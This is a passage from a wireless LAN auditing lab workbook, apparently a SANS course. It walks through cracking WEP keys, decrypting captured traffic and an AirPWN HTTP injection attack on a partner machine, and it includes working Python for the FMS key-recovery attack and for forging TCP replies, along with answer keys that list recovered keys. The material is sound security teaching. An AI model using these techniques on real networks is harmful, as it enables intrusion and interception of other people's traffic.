First, run John the Ripper with no command-line arguments to see a list of available options, as shown below.

# john
John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer
Usage: /usr/src/john-1.6/run/john [OPTIONS] [PASSWORD-FILES]
-single                    "single crack" mode
-wordlist:FILE -stdin      wordlist mode, read words from FILE or stdin
-rules                     enable rules for wordlist mode
-incremental[:MODE]        incremental mode [using section MODE]
-external:MODE             external mode or word filter
-stdout[:LENGTH]           no cracking, just write words to stdout
-restore[:FILE]            restore an interrupted session [from FILE]
-session:FILE              set session file name to FILE
-status[:FILE]             print status of a session [from FILE]
-makechars:FILE            make a charset, FILE will be overwritten
-show                      show cracked passwords
-test                      perform a benchmark
-users:[-]LOGIN|UID[,..]   load this (these) user(s) only
-groups:[-]GID[,..]        load users of this (these) group(s) only
-shells:[-]SHELL[,..]      load users with this (these) shell(s) only
-salts:[-]COUNT            load salts with at least COUNT passwords only
-format:NAME               force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL             enable memory saving, at LEVEL 1..3
#

Note that the output presented here may be slightly different from the version included on the current Backtrack Linux distribution. The options "-wordlist", "-rules" and "-stdout" are what we will use to generate a list of dictionary word permutations. Let's examine the number of permutations John will create for each word in the wordlist. Create a file with one word using the "echo" command as shown below, and supply this file as a command-line option to John.
# echo myword > oneword
# john -wordlist:oneword -rules -stdout
Myword
mywords
myword1
Myword1
mywordmyword
drowym
1myword
MYWORD
words: 52  time: 0:00:00:00 100%  w/s: 52.00  current: Mywording
#

Note that John creates 52 permutations for each word. If we took the time to convert our small dictionary file to include these permutations, it would grow from 135,425 words to over 7 million words.

Let's combine the flexibility of John with WEPAttack to attempt to recover the WEP key in the wepattack2.dump capture file. Using the wordlist supplied in the lab files, instruct John to create the dictionary permutations, passing the output to WEPAttack, as shown below.

# john -wordlist:words -rules -stdout | wepattack -f wepattack2.dump
Extraction of necessary data was successfull!
Founded BSSID:
1) 00 40 96 47 86 CE / Key 0
1 network loaded...
Accepting wordlist data
key no. Stanton
key no. backpackers
key no. chivalric
key no. defied
#

Question: Was WEPAttack able to recover the WEP key for the wepattack2.dump file?

Question: What is the key that was recovered? Please note the key somewhere handy.

Question: How many words did WEPAttack try as the WEP key before identifying the correct key?

Question: Is the WEP key that was recovered a typical permutation implemented by users when selecting "strong" passwords?

Question: What other techniques do users commonly implement when selecting strong passwords? Would it be valuable to add these permutations to John as well?

6.1.5. Mounting an FMS Attack

The arrival of the Aircrack-ng tool is another significant blow to WEP networks. Previously, it was thought that WEP networks that filter the well-known weak IVs would be immune to FMS attacks. In practice, WEP IV filtering makes these networks immune to attacks from AirSnort, but not from more advanced tools such as Aircrack-ng, whose KoreK statistical attacks (the 17 attack methods selectable with its "-k" option) do not depend on the classic weak-IV classes. In this step, we'll use the Aircrack-ng tool to recover the WEP key in the "aircrack-ng.dump" capture.
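Before running the tool, it helps to see what a weak-IV attack computes. The following Python is an added example, not code from the workbook or from Aircrack-ng; it runs the classic FMS attack against a 40-bit key on a capture constructed in memory. Every WEP data frame begins with the LLC/SNAP byte 0xAA, so the first ciphertext byte XOR 0xAA is the first RC4 keystream byte, and for IVs of the form (B+3, 255, X) that byte reveals key byte B roughly 5% of the time. The attack tallies votes per key byte, branches over the best candidates (the idea behind Aircrack-ng's fudge factor) and verifies a full key against a few frames. The key, the set of IVs, the branch limit and the vote threshold are choices made for this example. Filtering exactly these IVs is the AirSnort-era defence mentioned above; the KoreK correlations that Aircrack-ng adds are not implemented here.

```python
# Added example, not code from the SANS workbook or from Aircrack-ng: the
# classic FMS weak-IV attack on a 40-bit WEP key, run against a capture that
# is constructed in memory (first ciphertext byte per frame, plaintext 0xAA).
from collections import Counter

SNAP_DSAP = 0xAA                     # first plaintext byte of every WEP data frame


def rc4_first_byte(key):
    """RC4 key scheduling on `key`, then the first keystream byte."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    j = S[1]                         # PRGA step with i = 1
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def fms_vote(iv, known, z):
    """One vote for secret byte number len(known), or None when this IV is not
    'resolved' for that position.  iv: 3 bytes; known: secret bytes already
    recovered; z: the first keystream byte observed with this IV."""
    B = len(known)
    K = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(B + 3):           # the KSA steps that use only known key bytes
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    x = S[1]
    if x >= B + 3 or (x + S[x]) & 0xFF != B + 3:
        return None                  # S[1] and S[S[1]] do not point at position B+3
    # The next KSA step sets j' = j + S[B+3] + K[B+3] and moves S[j'] into
    # S[B+3]; when nothing later disturbs positions 1, x and B+3 (about 5% of
    # the time) the first keystream byte equals that value, so invert it.
    return (S.index(z) - j - S[B + 3]) & 0xFF


def recover_key(packets, key_len=5, max_branch=8, verify_n=4):
    """packets: list of (iv, first ciphertext byte).  Returns the key or None."""
    def matches(key):
        return all(rc4_first_byte(list(iv) + key) ^ SNAP_DSAP == c
                   for iv, c in packets[:verify_n])

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if matches(prefix) else None
        votes = Counter()
        for iv, c in packets:
            v = fms_vote(iv, prefix, c ^ SNAP_DSAP)
            if v is not None:
                votes[v] += 1
        if not votes:
            return None
        top = votes.most_common(1)[0][1]
        for value, n in votes.most_common(max_branch):
            if n < max(2, top // 2):     # branch only over plausible candidates
                break
            found = search(prefix + [value])
            if found is not None:
                return found
        return None

    return search([])


def simulate_capture(key):
    """Constructed capture: one frame per weak IV (B+3, 255, X) for each key
    byte.  A real capture holds these among millions of ordinary IVs."""
    packets = []
    for B in range(len(key)):
        for x in range(256):
            iv = (B + 3, 255, x)
            packets.append((iv, rc4_first_byte(list(iv) + list(key)) ^ SNAP_DSAP))
    return packets


EXAMPLE_KEY = [0x0E, 0xF0, 0xA8, 0x95, 0x05]   # wep key 1 of nd1.dump from the answers

if __name__ == "__main__":
    found = recover_key(simulate_capture(EXAMPLE_KEY))
    print("recovered:", ":".join("%02x" % b for b in found) if found else "failed")
```

With real traffic the first step is the one Wireshark does for you in the next part of this exercise: keep only data frames, take each frame's IV and first encrypted byte, and feed them to the voting loop; an access point that never emits (B+3, 255, X) IVs starves this particular attack, which is why aircrack-ng's additional correlations matter.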
First, let's take a look at the Aircrack-ng command-line options by running "aircrack-ng" with no parameters, as shown below.

# aircrack-ng
Aircrack-ng 0.6.2 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:
  -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
  -e <essid> : target selection: network identifier
  -b <bssid> : target selection: access point's MAC
  -q         : enable quiet mode (no status output)

Static WEP cracking options:
  -c         : search alpha-numeric characters only
  -t         : search binary coded decimal chr only
  -h         : search the numeric key for Fritz!BOX
  -d <mask>  : debug - specify mask of the key (A1:XX:CF:YY)
  -m <maddr> : MAC address to filter usable packets
  -n <nbits> : WEP key length : 64/128/152/256/512
  -i <index> : WEP key index (1 to 4), default: any
  -f <fudge> : bruteforce fudge factor, default: 2
  -k <korek> : disable one attack method (1 to 17)
  -x or -x0  : disable last keybytes bruteforce
  -x1        : enable last keybyte bruteforcing (default)
  -x2        : enable last two keybytes bruteforcing
  -X         : disable bruteforce multithreading (SMP only)
  -y         : experimental single bruteforce mode
  -s         : show ASCII version of the key

WPA-PSK cracking options:
  -w <words> : path to a dictionary file
#

Note that the "-n" option specifies whether Aircrack-ng should attempt to recover a 64-bit or a 128-bit key. Aircrack-ng even supports the non-standard key lengths of 152, 256 and 512 bits used by some vendors. By default, Aircrack-ng will attempt to recover a 128-bit key and will be unable to recover the key if the network uses a 64-bit key. For this reason, if the first attempt to recover the key with Aircrack-ng does not succeed, the auditor should run Aircrack-ng again specifying "-n 64" to attack a 64-bit key.

Next, take a look at the "aircrack-ng.dump" packet capture file with Wireshark. Launch Wireshark as shown below. Note that the aircrack-ng.dump packet capture file is very large, which may cause Wireshark to run slowly.
# wireshark -r aircrack-ng.dump -n &
[1] 2345
#

Question: What is the delta in time between the first and the last packet captured?

Question: How many data packets are in the capture file?
(Hint: You will need to apply a display filter to answer this question)
(Hint: Select a data packet; check the display name for the type/subtype field)

Next, quit Wireshark and return to the XTerm prompt. Initiate Aircrack-ng by specifying the "aircrack-ng.dump" file as a command-line parameter, as shown below.

# aircrack-ng aircrack-ng.dump
#

Question: Was Aircrack-ng able to recover the WEP key from the aircrack-ng.dump file?

Question: How long did it take for Aircrack-ng to recover the key?

Question: What is the WEP key that was recovered? Please note the key somewhere handy.

Question: Is the WEP key discovered by Aircrack-ng likely to be recovered with wep_crack or WEPAttack? Why, or why not?

6.1.6. Decrypting WEP Traffic

After recovering the WEP key we can use different tools to decrypt the contents of traffic to identify the extent of information disclosure on the network.

6.1.6.1 Decrypting Traffic with Wireshark

Wireshark includes an option to decrypt the contents of WEP traffic when supplied with an appropriate WEP key. Let's look at this option for examining the plaintext contents of the file "nd2.dump". Start Wireshark, opening the "nd2.dump" capture file, as shown below.

# wireshark -r nd2.dump -n &
[1] 2259
#

Next, navigate to the Wireshark preferences menu by clicking "Edit > Preferences". In the preferences window, expand the "Protocols" tree, then scroll and select the "IEEE 802.11" protocol as shown below.

Wireshark preferences for the IEEE 802.11 packet dissector ("Enable decryption" checkbox and the "WEP key #1" through "WEP key #10" fields).

We can specify multiple WEP keys in the 802.11 preferences screen.
Wireshark will attempt to decrypt every WEP-encrypted packet with each key you specify, until it decrypts the packet successfully or runs out of keys to use. When specifying the WEP key, Wireshark will only accept the hex representation of the key, with each byte separated by colons. Wireshark will not accept ASCII strings for WEP keys. For example, if the WEP key is "f2 87 d5 99 73", you should enter the key as "f2:87:d5:99:73".

Supply the WEP key for the nd2.dump file in the "WEP key #1" text box. Next, check the "Enable decryption" checkbox, then click "OK" to apply the settings. It is not necessary to supply more than the first key for decrypting the traffic in this capture file.

NOTE: Supply the WEP key for the "nd2.dump" file that you discovered in step 6.1.2.

In the Wireshark view, select frame number 2. Notice the tabs below the packet bytes view, offering a choice between the frame as captured from the network and the "Decrypted WEP data" view. Inspect the data in these data frames and answer the questions below. Quit Wireshark when you are finished with this step.

Question: What is the protocol for the two data packets in this capture file?

Question: What valuable information can be observed from the unencrypted traffic content?

Question: What kind of a server generated these packets? What version information can be determined from the packet content?

6.1.6.2 Decrypting Traffic with airdecap-ng

The airdecap-ng tool supplied with the Aircrack-ng suite takes an input libpcap file of WEP-encrypted content and the WEP key, and generates an output file of unencrypted content. While Wireshark preserves the 802.11 header information when it decrypts WEP content, airdecap-ng by default generates a standard Ethernet-encapsulated file with the unencrypted packet content (its "-l" option keeps the 802.11 header instead). At an XTerm prompt, run the airdecap-ng command with no options to see a list of the available command-line options, as shown below.
# airdecap-ng
Airdecap-ng 0.6.2 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: airdecap-ng [options] <pcap file>
  -l         : don't remove the 802.11 header
  -b <bssid> : access point MAC address filter
  -k <pmk>   : WPA Pairwise Master Key in hex
  -e <essid> : target network SSID
  -p <pass>  : target network WPA passphrase
  -w <key>   : target network WEP key in hex
#

The usage for this tool is simple: specify the WEP key with the "-w" option and the input file containing WEP-encrypted content; the output filename is derived from the input filename. airdecap-ng accepts the hexadecimal key bytes with or without colon delimiters between them. Using the "nd1.dump" capture file, generate a libpcap file with airdecap-ng containing the unencrypted content, as shown below.

# airdecap-ng -w 0e:f0:a8:95:05 nd1.dump
Total number of packets read
Total number of WEP data packets
Total number of WPA data packets
Number of plaintext data packets
Number of decrypted WEP packets
Number of decrypted WPA packets
#

The airdecap-ng tool will create a new file of unencrypted data by appending "-dec" to the filename before the extension. Open the "nd1-dec.dump" capture file with Wireshark, tshark, tcpdump or strings to see the embedded message.

6.1.7. Live Key Recovery

In this exercise we'll capture traffic on a live lab network and attempt the recovery of the WEP key. Follow these steps to collect encrypted traffic and recover the WEP key for the target network.

6.1.7.1. Using Kismet, identify the channel in use for the "SANS-WEP" network.

6.1.7.2. Configure your wireless card in monitor mode on the same channel as the "SANS-WEP" network using the "iwconfig" tool, as shown below. Replace the channel number with the correct channel identified in the previous step.

# iwconfig wlan0 mode monitor channel <channel>
# ifconfig wlan0 up
#

6.1.7.3. Capture traffic using the "airodump-ng" packet capture tool, specifying the interface name and the libpcap capture filename, as shown below.
# airodump-ng -w lab6capture wlan0

Note that airodump-ng will automatically append the extension ".cap" to the end of the file together with a unique number, initially generating a "lab6capture-01.cap" filename. Continue capturing traffic until you have captured at least 200,000 IVs. After you have captured a sufficient amount of traffic, press "CTRL/C" to quit airodump-ng.

NOTE: If the counter indicating the number of IV frames slows down considerably or stops, please alert a proctor or the instructor.

6.1.7.4. Use aircrack-ng to recover the WEP key as shown below. If Aircrack-ng is unable to recover the key after 1-2 minutes of processing, restart airodump-ng, specifying the same "lab6capture" filename. airodump-ng will append new packets to the end of the previous capture file. Capture an additional 25,000 IVs and return to this step. Repeat until you have successfully recovered the WEP key.

# aircrack-ng -n 64 lab6capture*
#

Question: What is the WEP key that is recovered from the network?

This completes our sixth lab exercise. Congratulations.

Answers

Section 6.1.1

Question: What is the relationship between the IV values in frames 1, 3 and 4? Are they random or sequentially selected?
Answer: The three frames have IV values that are each one greater than the previous IV. The IV values are a sequential counter stored in big-endian format.

Question: What is the relationship between the IV values in frames 2, 5 and 6?
Answer: The IVs for this source address appear to be random.

Section 6.1.2

Question: Was wep_crack able to recover the WEP key for the nd1.dump file?
Answer: Yes, the WEP key is 40 bits in length.

Question: What is the WEP key used for this capture file? Please note the key somewhere handy.
Answer:
wep key 1: 0e:f0:a8:95:05
wep key 2: db:68:1c:45:a5
wep key 3: 1a:d4:2c:1d:48
wep key 4: fsaf:d8:93:10

Question: How many seconds did wep_crack take to recover the key? How many guesses per second was wep_crack able to perform?
Answer: An Intel Celeron 2 GHz processor was able to recover this key in a little over 7 seconds.

Question: What is the WEP key for the nd2.dump packet capture? How long did it take to recover the key?
Answer: Key recovery took 0.03 seconds on an Intel Celeron 2 GHz processor.
wep key 1: 73:99:d5:87:12
wep key 2: 14:86:f0:42:6c
wep key 3: 0e:34:65:da:93
wep key 4: 8d:de:26:d2:a3

Question: How long did wep_crack take to test all permutations of keys for the nd3.dump file?
Answer: wep_crack ran for 24.45 seconds on an Intel Celeron 2 GHz processor.

Section 6.1.3

Question: Was WEPAttack able to recover the WEP key from the wepattack1.dump capture file?
Answer: Yes.

Question: What is the key that was recovered? Please note the key somewhere handy.
Answer: "perpetuate"

Question: Which of the four WEPAttack modes is reported as the mechanism used to generate the key that was discovered?
Answer: The key was recovered with the 104-bit key generation algorithm (denoted with the word "KEYGEN" by wepattack).

Question: How long did it take to recover the key? How many words per second is WEPAttack able to test?
Answer: The key was recovered in approximately 1.8 seconds at a rate of over 8000 words/second. This time may vary depending on your processor speed and the speed of your hard drive.

Question: Were you able to recover the key from the wepattack2.dump file?
Answer: No. WEPAttack completed testing all 144,711 words in the dictionary file in approximately 17.9 seconds.

Section 6.1.4

Question: Was WEPAttack able to recover the WEP key for the wepattack2.dump file?
Answer: Yes.

Question: What is the key that was recovered? Please note the key somewhere handy.
Answer: "pacification!"

Question: How many words did WEPAttack try as the WEP key before identifying the correct key?
Answer: 1,458,457 words in approximately 3 minutes.
Question: Is the WEP key that was recovered a typical permutation implemented by users when selecting "strong" passwords?
Answer: Yes, this key uses the common technique of adding punctuation to the end of a password to make it harder to guess.

Question: What other techniques do users commonly implement when selecting strong passwords? Would it be valuable to add these permutations to John as well?
Answer: Other common techniques include substituting the letter "a" with "@" or "4", substituting "i" with "1" (one) and substituting "e" with "3". Adding these permutations to John's rules would make for an even more effective dictionary attack.

Section 6.1.5

Question: What is the delta in time between the first and the last packet captured?
Answer: Four minutes, 14 seconds. This can be determined by subtracting the timestamp of the first packet from that of the last packet, or by inspecting the capture summary under the Wireshark "Statistics" menu.

Question: How many data packets are in the capture file?
Answer: 251,323 data packets in the aircrack-ng.dump capture file. This can be identified by inspecting the status bar to identify the number of displayed packets after applying the display filter "wlan.fc.type_subtype eq 32".

Question: Was Aircrack-ng able to recover the WEP key from the aircrack-ng.dump file?
Answer: Yes.

Question: How long did it take for Aircrack-ng to recover the key?
Answer: 1 minute 13 seconds on a Celeron 2 GHz system.

Question: What is the WEP key that was recovered? Please note the key somewhere handy.
Answer: The WEP key is 83:6a:74:b5:93:a2:ac:fa:1e:c8:d6:e2:d7

Question: Is the WEP key discovered by Aircrack-ng likely to be recovered with wep_crack or WEPAttack? Why, or why not?
Answer: WEPAttack would be unable to recover WEP keys that are not based on dictionary words, such as the key used in the aircrack-ng.dump capture, and wep_crack only searches the keys produced by the Neesus Datacom generator.
With a sufficient number of packets, Aircrack-ng would be able to recover the WEP key regardless of whether it is based on an ASCII word or is completely random, because the statistical attack works on the keystream rather than on how the key was chosen.

Section 6.1.6.1

Question: What is the protocol for the two data packets in this capture file?
Answer: The two data packets are multicast SSDP traffic for Universal Plug and Play (UPnP).

Question: What valuable information can be observed from the unencrypted traffic content?
Answer: IP address information is revealed.

Question: What kind of a server generated these packets? What version information can be determined from the packet content?
Answer: In the Hypertext Transfer Protocol header, we can identify the host as a Linux system running the 2.4.17 kernel.

Section 6.1.7.4

Question: What is the WEP key that is recovered from the network?
Answer: The WEP key is "a1:31:90:09:24".

Lab 7 - Client Attacks

Complete the exercises in this lab to reinforce the material covered in the Wireless Client Exposure and Vulnerabilities module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.

Lab 7-1: Hotspot Injection Attacks

Purpose: This lab will provide hands-on experience with a traffic manipulation attack against a wireless station.

Description: In this lab exercise you will use the AirPWN tool to manipulate the response to a client that makes an HTTP GET request, replying with arbitrary content of your choosing. In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked "[VICTIM]" and will be the target of the injection attack. The second system will follow the steps marked "[ATTACKER]" to mount the injection attack. You may optionally wish to switch roles after completing this lab so each person has the opportunity to attack another system.

7.1.1.
[VICTIM] Connect to the classroom network

Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

7.1.2. [VICTIM] Identify address information

Next, the victim will identify client information that will be used by the attacker to target the attack. The information that is needed is the IP address of the victim wireless card. We can identify the IP address of the wireless card by running the "ifconfig" utility, as shown below:

# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:6F:33:BC:41
          inet addr:172.16.0.101  Bcast:172.16.0.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:43830 errors:0 dropped:20 overruns:0 frame:0
          TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3802818 (3.6 Mb)  TX bytes:816024 (796.8 Kb)
          Interrupt:10 Memory:e836e000-e936f000

The string following "inet addr:" in this output is the IP address of the wireless card. Write this address information in the space provided below.

Next, use the "iwconfig" utility to identify the channel information for the access point you are currently associated to, as shown below.

# iwconfig wlan0
wlan0     IEEE 802.11b  ESSID:"SANS-ROGUE01"
          Mode:Managed  Frequency:2.462GHz  Access Point: 00:0F:66:83:76:38
          Bit Rate:11Mb/s   Sensitivity=1/3
          Retry min limit:8   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:23/70  Signal level:-70 dBm  Noise level:-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:11  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:3663   Missed beacon:0
#

The string following "Frequency:" indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below.
Identify the channel number in use by matching the frequency in the following chart:

Frequency (GHz)   Channel       Frequency (GHz)   Channel
2.412             1             2.447             8
2.417             2             2.452             9
2.422             3             2.457             10
2.427             4             2.462             11
2.432             5             2.467             12
2.437             6             2.472             13
2.442             7             2.484             14

Use the following space to document the IP address and channel number for the victim station:

Victim IP address: ________________   Channel: ____

7.1.3. [VICTIM] Test web browsing

Ensure the victim client can access web resources on the Internet by opening the web browser (Firefox) on the victim and browsing to a public website such as www.google.com.

7.1.4. [ATTACKER] Examine injection file contents

AirPWN uses at least two files for the attack: a configuration file that specifies the requests the attacker should respond to, and a response file that holds the actual content to respond with. For the purposes of this lab, we've supplied both the configuration file and the response file on the lab CD. Change to the lab 7 directory and examine the configuration file contents, as shown below:

# cd /tmp/lab7
# ls
airpwn*  airpwn.1  conf/  content/
# cat conf/greet_html
begin greet_html
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)
response content/greet_html
#

The "match" line is a regular expression that selects any request payload beginning with the string "GET" or "POST". The "ignore" line excludes requests that begin with "GET" and whose path ends in one of the listed image extensions, so requests for images are left alone. When the match succeeds and the ignore does not, the AirPWN tool responds with the content in the response file, "content/greet_html". Next, examine the response file contents:

# cat content/greet_html
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<html>
<head><title>HELLO SANS SEC617 PARTICIPANT</title></head>
<body>
Thanks for participating in the SANS SEC617 Client Attacks lab! Are we having fun yet?
</body>
</html>
We can see the response file contains an HTTP response message with simple HTML content. Of course, this could be any content the attacker desired.

7.1.5. [ATTACKER] Introduction to AirPWN

Next, run the AirPWN command with no command-line parameters to identify a list of available options, as shown below:

# ./airpwn
usage: airpwn -i <interface> -c <conf file> -d <driver name> -t <target IP> [options]
  -i <interface>   : interface to listen on (must be in monitor mode)
  -c <conf file>   : configuration file
  -d <driver name> : supported wireless driver name
  -t <target IP>   : IP address of host you are targeting
optional arguments:
  -C <channel>     : channel number to sniff/inject on
  -l <logfile>     : log verbose data to a file
  -f <filter>      : bpf filter for libpcap
  -h               : get help (this stuff)
  -v               : increase verbosity (can be used multiple times)
Supported drivers are: wlan-ng hostap airjack prism54 madwifiold madwifing rtl8180 rt2500 rt2570
#

NOTE: If you are getting a "permission denied" error when running the airpwn command, ensure you have specified the leading dot-slash ("./airpwn") as shown in the example above.

Before using AirPWN, we need to modify the link type of the SWAT kit wireless card. With the HostAP drivers, the default link type in monitor mode prepends a Prism/AVS header carrying RSSI and other statistics to each frame. AirPWN does not support this header type, so it is necessary to change the link type to the standard 802.11 header with the iwpriv command, as shown:

# iwpriv wlan0 monitor_type 0
#

The command-line options we are going to use for the injection attack are detailed as follows:

Option   Argument           Description
-i       wlan0              Interface name to use for transmitting packets
-C       <channel>          Channel the victim is operating on
-d       wlanng             Driver name used for the wlan0 interface
-t       <victim IP>        IP address of the victim
-c       conf/greet_html    Configuration file

Substitute "<victim IP>" and "<channel>" with the information collected from the victim station. Implementing the injection attack is straightforward.
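To see what the injector has to put on the wire when a matching request goes by, here is an added Python example that is not code from the workbook or from AirPWN. It applies the match/ignore rules from conf/greet_html to the victim's HTTP request and builds the forged IPv4/TCP reply that wins the race with the real server: addresses and ports swapped, the sequence number set to the client's acknowledgment number, the acknowledgment number set to the client's sequence number plus the length of the request, and valid checksums. The 802.11 framing and the transmission through the driver that AirPWN handles are left out, and the victim request, addresses and ports are constructed.

```python
# Added example, not code from the SANS workbook or from airpwn: the
# IPv4/TCP segment an injector must forge once it sees a matching request.
# The victim request below is constructed; 802.11 framing and transmission
# through the driver are left out.
import re
import struct

MATCH = re.compile(rb"^(GET|POST)")                                 # from conf/greet_html
IGNORE = re.compile(rb"^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)")  # from conf/greet_html
GREET_HTML = (b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n"
              b"<html><head><title>HELLO SANS SEC617 PARTICIPANT</title></head>"
              b"<body>Thanks for participating in the SANS SEC617 Client Attacks lab!"
              b"</body></html>")
PSH_ACK, PSH_ACK_FIN = 0x18, 0x19


def checksum(data):
    """RFC 1071 one's-complement sum; a correct header/segment sums to 0."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def should_inject(payload):
    """airpwn rule semantics: the match pattern must hit and the ignore must not."""
    return bool(MATCH.search(payload)) and not IGNORE.search(payload)


def build_segment(src, dst, sport, dport, seq, ack, flags, payload):
    """IPv4 header + TCP header (no options) + payload, checksums filled in."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 65535, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0x1234, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_segment(pkt):
    """The fields of an IPv4/TCP segment that the injector needs."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {"src": pkt[12:16], "dst": pkt[16:20], "sport": sport, "dport": dport,
            "seq": seq, "ack": ack, "flags": off_flags & 0x3F,
            "payload": tcp[(off_flags >> 12) * 4:]}


def checksums_ok(pkt):
    """True when both the IPv4 header checksum and the TCP checksum verify."""
    ihl = (pkt[0] & 0x0F) * 4
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(pkt) - ihl)
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + pkt[ihl:]) == 0


def forge_response(request_pkt, body=GREET_HTML):
    """The spoofed server reply for a matching request, or None otherwise.

    Addresses and ports are swapped; seq is what the client expects next (its
    ACK number); ack covers the whole request so the client treats it as
    answered. The genuine reply, arriving later, overlaps data the client has
    already accepted."""
    req = parse_segment(request_pkt)
    if not should_inject(req["payload"]):
        return None
    return build_segment(req["dst"], req["src"], req["dport"], req["sport"],
                         seq=req["ack"], ack=req["seq"] + len(req["payload"]),
                         flags=PSH_ACK_FIN,       # deliver the page and close the connection
                         payload=body)


# Constructed victim request 172.16.0.101:49152 -> 93.184.216.34:80
VICTIM, SERVER = bytes([172, 16, 0, 101]), bytes([93, 184, 216, 34])
REQUEST = build_segment(VICTIM, SERVER, 49152, 80, 1000, 5000, PSH_ACK,
                        b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n")

if __name__ == "__main__":
    reply = forge_response(REQUEST)
    fields = parse_segment(reply)
    print("seq=%d ack=%d flags=0x%02x checksums_ok=%s" %
          (fields["seq"], fields["ack"], fields["flags"], checksums_ok(reply)))
```

Two things follow from this. The injector never needs the real server's reply, only the client's request, which is why it works against any unencrypted site; and a TLS session defeats it, because the forged bytes do not authenticate under the session keys.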
Simply run the AirPWN command with the appropriate arguments, as shown below:

# ./airpwn -i wlan0 -C <channel> -d wlanng -t <victim IP> -c conf/greet_html
airpwn - modified for SANS SEC617 lab
Listening for packets

At this point, the attacker is positioned to manipulate the contents of any HTTP GET request that originates from the specified IP address.

7.1.6. [VICTIM] Browse to an unencrypted website

Return to the victim station and browse to any unencrypted website to generate the HTTP GET request that the attacker is configured to identify. Instead of the desired website content, you should receive the content from the attacker's response file.

7.1.7. [ATTACKER] Stop the client attack

Return to the attacker's session and stop the injection attack by pressing "CTRL/C". This will cause AirPWN to stop gracefully, returning to the shell prompt.

7.1.8. [VICTIM] Refresh website

After the attacker stops the injection attack, the victim station should return to normal connectivity. Refreshing the target website should produce the appropriate results. If your system returns an error indicating "ioctl(): Device or resource is busy", it will be necessary to physically eject and reinsert your wireless card.

Additional Exercise

If you have extra time after completing this lab with your partner, modify the response file to supply your own message to the victim. Be creative, but polite.

Lab 8 - Auditing LEAP Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing LEAP Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 8-1: Examining LEAP Networks

Purpose: Introduce the techniques used to identify LEAP networks from a supplied capture file.
Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that uniquely identifies the use of the Cisco LEAP protocol.

8.1.1. Identify LEAP Traffic

Using the supplied capture file, identify all EAP traffic that uses the LEAP protocol. Start the Wireshark sniffer by clicking "K -> Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text box, then click the Run button. Open the capture file for this lab by clicking "File -> Open", navigate to the /tmp/lab8 folder and select the "lab8traffic.dump" capture file.

Next, apply a display filter that will display only LEAP traffic.
(Hint: Use the display fields in a packet marked as LEAP)
(Hint: Select frame 211 for a sample LEAP packet)
(Hint: Use the "type" field in the Extensible Authentication Protocol header)
(Hint: The assigned EAP type for LEAP is 17, or hexadecimal 0x11)
(Hint: "eap.type eq 17")
(Hint: The display filter should return 38 packets)

Note that this display filter identifies only traffic that includes LEAP data, and does not include the start, stop, success or failure messages. We can apply a less-specific display filter that includes LEAP and other EAP-related traffic. Remove the previous display filter, replacing it with "eapol" to display all EAP traffic, regardless of EAP type.

Question: How many packets are returned from this new filter?

Question: What additional information is included in this packet display?

8.1.2. Examining the LEAP Five-Way Handshake

The five-way LEAP handshake defines how a station authenticates to an access point, and how the access point mutually authenticates to the station. Let's take a look at this process. Apply the following filter to limit the display to the initial five-way handshake in the "lab8traffic.dump" capture file:

eapol and frame.number > 210 and frame.number < 222

Examine the frames in this exchange and answer the questions below.

Question: What is the MAC address of the access point?
Question: What is the MAC address of the station?

